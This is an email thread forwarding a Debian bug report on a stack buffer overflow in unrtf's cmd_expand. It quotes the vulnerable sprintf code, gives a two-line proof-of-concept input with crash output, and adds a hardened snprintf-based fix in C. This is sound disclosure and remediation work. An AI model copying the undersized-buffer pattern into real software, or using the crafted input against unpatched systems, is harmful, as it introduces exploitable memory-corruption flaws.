Hi Dave,
Hi Jean-Francois,

I got the following bug report, apparently describing a buffer overflow
in unrtf - which I can reproduce. Do you have a suggestion for a fix?

I'm also CCing Debian's security team.

WM

On 2016-12-30 at 01:44, Skylake wrote:
> Package: unrtf
> Version: 0.21.9-clean-2
> 
> I've found a stack-based buffer overflow in unrtf 0.21.9, which affects three 
> functions: cmd_expand, cmd_emboss and cmd_engrave.
> 
> # convert.c
> 
> static int
> cmd_expand (Word *w, int align, char has_param, int param) {
>      char str[10];
>      if (has_param) {
>          /* Overflow: a 9-digit negative value triggers the bug */
>          sprintf(str, "%d", param/4);
>          if (!param)
>              attr_pop(ATTR_EXPAND);
>          else
>              attr_push(ATTR_EXPAND, str);
>      }
>      return FALSE;
> }
> 
> Apparently writing a negative integer to the buffer can trigger the overflow 
> (Minus sign needs an extra byte).
> 
> * How to trigger the bug *
> 
> $ echo "\expnd-400000000" > poc
> $ unrtf poc
> 
> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
> <html>
> <head>
> <meta http-equiv="content-type" content="text/html; charset=utf-8">
> <!-- Translation from RTF performed by UnRTF, version 0.21.9 -->
> *** buffer overflow detected ***: unrtf terminated
> ======= Backtrace: =========
> /lib/i386-linux-gnu/libc.so.6(+0x6737a)[0xb764f37a]
> /lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x37)[0xb76dfe07]
> /lib/i386-linux-gnu/libc.so.6(+0xf60a8)[0xb76de0a8]
> /lib/i386-linux-gnu/libc.so.6(+0xf58b8)[0xb76dd8b8]
> /lib/i386-linux-gnu/libc.so.6(_IO_default_xsputn+0xa6)[0xb7653bf6]
> /lib/i386-linux-gnu/libc.so.6(_IO_vfprintf+0xf66)[0xb762b1d6]
> /lib/i386-linux-gnu/libc.so.6(__vsprintf_chk+0x90)[0xb76dd950]
> /lib/i386-linux-gnu/libc.so.6(__sprintf_chk+0x20)[0xb76dd8a0]
> unrtf[0x804c7b8]
> unrtf[0x804f77d]
> unrtf[0x804f9e7]
> unrtf[0x804920b]
> /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7600276]
> unrtf[0x804953c]
> ======= Memory map: ========
> 08048000-0805b000 r-xp 00000000 08:01 405354     /usr/bin/unrtf
> 0805b000-0805c000 r--p 00012000 08:01 405354     /usr/bin/unrtf
> 0805c000-0805d000 rw-p 00013000 08:01 405354     /usr/bin/unrtf
> 0805d000-08085000 rw-p 00000000 00:00 0
> 0952d000-0954e000 rw-p 00000000 00:00 0          [heap]
> b75ca000-b75e6000 r-xp 00000000 08:01 393233     /usr/lib/i386-linux-gnu/libgcc_s.so.1
> b75e6000-b75e7000 r--p 0001b000 08:01 393233     /usr/lib/i386-linux-gnu/libgcc_s.so.1
> b75e7000-b75e8000 rw-p 0001c000 08:01 393233     /usr/lib/i386-linux-gnu/libgcc_s.so.1
> b75e8000-b7799000 r-xp 00000000 08:01 395818     /usr/lib/i386-linux-gnu/libc-2.24.so
> b7799000-b779b000 r--p 001b0000 08:01 395818     /usr/lib/i386-linux-gnu/libc-2.24.so
> b779b000-b779c000 rw-p 001b2000 08:01 395818     /usr/lib/i386-linux-gnu/libc-2.24.so
> b779c000-b779f000 rw-p 00000000 00:00 0
> b77a3000-b77a6000 rw-p 00000000 00:00 0
> b77a6000-b77a8000 r--p 00000000 00:00 0          [vvar]
> b77a8000-b77aa000 r-xp 00000000 00:00 0          [vdso]
> b77aa000-b77cc000 r-xp 00000000 08:01 393914     /usr/lib/i386-linux-gnu/ld-2.24.so
> b77cc000-b77cd000 rw-p 00000000 00:00 0
> b77cd000-b77ce000 r--p 00022000 08:01 393914     /usr/lib/i386-linux-gnu/ld-2.24.so
> b77ce000-b77cf000 rw-p 00023000 08:01 393914     /usr/lib/i386-linux-gnu/ld-2.24.so
> bf992000-bf9b3000 rw-p 00000000 00:00 0          [stack]
> Aborted
> 
> * Test environment *
> 
> Linux debian 4.7.0-1-686-pae #1 SMP Debian 4.7.8-1 (2016-10-19) i686 GNU/Linux
> libc6 2.24-8
> 
> Regards,
> Amir
> 
> Sent with ProtonMail <https://protonmail.com> Secure Email.
> 

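The root cause in the quoted cmd_expand is a 10-byte stack buffer that cannot hold the decimal text of every int: the worst case, INT_MIN, needs a sign, ten digits and a NUL, twelve bytes in all, and the report's -400000000 already yields "-100000000" plus NUL, eleven bytes. The following is an added example, not code from the unrtf project or from this thread; it sizes the buffer for the worst case, swaps sprintf for a checked snprintf, and includes a helper that computes whether the original 10-byte buffer would have been exceeded for a given parameter. attr_push, attr_pop, ATTR_EXPAND and FALSE are hypothetical stand-ins for unrtf's attribute stack so the example runs stand-alone.

```c
#include <limits.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-ins for unrtf's attribute stack (not the project's code):
 * attr_push records the last pushed value, attr_pop counts pops. */
#define ATTR_EXPAND 1
#define FALSE 0

static char last_pushed[32];
static int  pop_count;

static void attr_push(int attr, const char *value)
{
    (void)attr;
    snprintf(last_pushed, sizeof last_pushed, "%s", value);
}

static void attr_pop(int attr)
{
    (void)attr;
    pop_count++;
}

/* Worst-case decimal text of an int: '-' + 10 digits (INT_MIN) + NUL. */
#define INT_DEC_LEN 12

/* Bounded formatting. Returns the number of characters written, or -1 if the
 * value would not have fit; on -1 the buffer is left as an empty string so a
 * caller can never consume stale or partial data. */
static int format_int_checked(char *buf, size_t buflen, int value)
{
    int n = snprintf(buf, buflen, "%d", value);
    if (n < 0 || (size_t)n >= buflen) {
        if (buflen)
            buf[0] = '\0';
        return -1;
    }
    return n;
}

/* Hardened version of cmd_expand with the same control flow as the report's
 * function (Word and align parameters dropped, they are unused there). */
static int cmd_expand_fixed(char has_param, int param)
{
    char str[INT_DEC_LEN];
    if (has_param) {
        if (format_int_checked(str, sizeof str, param / 4) < 0)
            return FALSE; /* cannot trigger with INT_DEC_LEN, kept explicit */
        if (!param)
            attr_pop(ATTR_EXPAND);
        else
            attr_push(ATTR_EXPAND, str);
    }
    return FALSE;
}

/* Would the original char str[10] have overflowed for this param?
 * Formats into a worst-case-sized scratch buffer and compares lengths. */
static int original_would_overflow(int param)
{
    char tmp[INT_DEC_LEN];
    int n = snprintf(tmp, sizeof tmp, "%d", param / 4);
    return n + 1 > 10; /* +1 for the terminating NUL */
}

/* Shows the truncation contract: a 4-byte buffer cannot hold "12345". */
static int demo_truncation(void)
{
    char small[4];
    return format_int_checked(small, sizeof small, 12345);
}

int main(void)
{
    printf("\\expnd-400000000 overflows original buffer: %d\n",
           original_would_overflow(-400000000));
    printf("\\expnd400000000 overflows original buffer: %d\n",
           original_would_overflow(400000000));
    cmd_expand_fixed(1, -400000000);
    printf("hardened version pushed: %s\n", last_pushed);
    return 0;
}
```

Because positive ints divide down to at most nine digits (INT_MAX / 4 = 536870911), only negative parameters with nine digits after the division reach the eleventh byte, which is why the reporter's PoC uses a negative value; sizing the buffer from INT_DEC_LEN rather than from a typical value removes the input-dependent branch entirely, and checking the snprintf return value is the habit that keeps the next such buffer from silently truncating instead.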